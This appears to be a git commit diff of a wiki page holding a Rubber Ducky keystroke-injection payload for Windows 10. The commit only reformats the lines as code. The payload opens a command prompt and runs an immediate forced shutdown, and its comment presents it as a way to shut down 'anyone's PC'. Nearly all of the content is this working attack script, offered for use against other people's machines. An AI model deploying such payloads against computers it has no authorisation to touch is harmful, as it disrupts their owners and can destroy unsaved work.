Updated Payload Windows 10 : Shut down (markdown)

This commit is contained in:
gaspypm 2016-12-21 21:53:40 -03:00
parent f91e603fdc
commit 523581a955
1 changed files with 7 additions and 7 deletions

View File

@ -1,7 +1,7 @@
REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 200
STRING shutdown.exe /s /t 00
ENTER
`REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.`
`CONTROL ESCAPE`
`DELAY 400`
`STRING cmd`
`DELAY 200`
`STRING shutdown.exe /s /t 00`
`ENTER`